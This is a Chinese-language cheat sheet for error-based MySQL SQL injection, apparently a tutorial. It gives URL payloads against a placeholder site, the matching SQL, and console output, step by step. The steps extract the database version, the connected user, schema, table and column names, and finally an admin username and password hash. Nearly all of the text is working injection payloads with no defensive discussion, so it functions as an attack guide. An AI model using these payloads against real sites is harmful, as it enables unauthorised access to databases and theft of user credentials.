0x01 爆数据库版本

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

数据库语句: select * from test where id =1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> select * from test where id =1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~5.5.53~1' for key 'group_key'

0x02 爆当前连接用户

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

数据库语句: select * from test where id =1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> select * from test where id =1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~root@localhost~1' for key 'group_key'

0x03 爆当前连接的数据库

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

数据库语句: select * from test where id =1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> select * from test where id =1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~test~1' for key 'group_key'

0x04 爆库名

注意: LIMIT 0 修改会显示其他库名
例如:
修改为0 就是出1库
修改为1 就是出2库

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

数据库语句-爆库名1: select * from test where id =1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

数据库语句-爆库名2: select * from test where id =1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> select * from test where id =1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~information_schema~1' for key 'group_key'

0x05 爆表名

注意: table_schema=xxx 修改为其他库会爆出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema='test' 会获取test库数据

注意: LIMIT 0 修改会爆出不同的表名
例如:
修改为0 就是出1表
修改为1 就是出2表

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

数据库语句-爆当前库的第一张表名: select * from test where id =1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

数据库语句-爆当前库的第二张表名: select * from test where id =1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> select * from test where id =1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~tdb_goods~1' for key 'group_key'

0x06 爆字段

table_schema = 'xx' 要爆的数据库名
table_name = 'xx' 要爆的表名

limit 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,username,password
limit 0 = id
limit 1 = username
limit 2 = password

web语句: http://www.test.com/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

数据库语句-爆test库 tdb_admin表的字段名:
select * from test WHERE id = 1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> SELECT * FROM test WHERE id = 1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,column_name,0x7e))) from information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~id~1' for key 'group_key'

0x07 爆内容

注意: limit 0 表示要显示哪一条数据
limit 0 表示第一条
limit 1 表示第二条

web语句: http://www.test.com/sql.php?id=1+and(select 1 from(select count(*),concat((select (select (select concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e))) from 库名.表名 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

数据库语句: select * from test WHERE id = 1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e))) from 库名.表名 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

  1. mysql> SELECT * FROM test WHERE id = 1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,id,0x3a,username,0x3a,password,0x7e))) from test.tdb_admin limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a);
  2. ERROR 1062 (23000): Duplicate entry '~1:admin:7fef6171469e80d32c0559f88b377245~1
  3. ' for key 'group_key'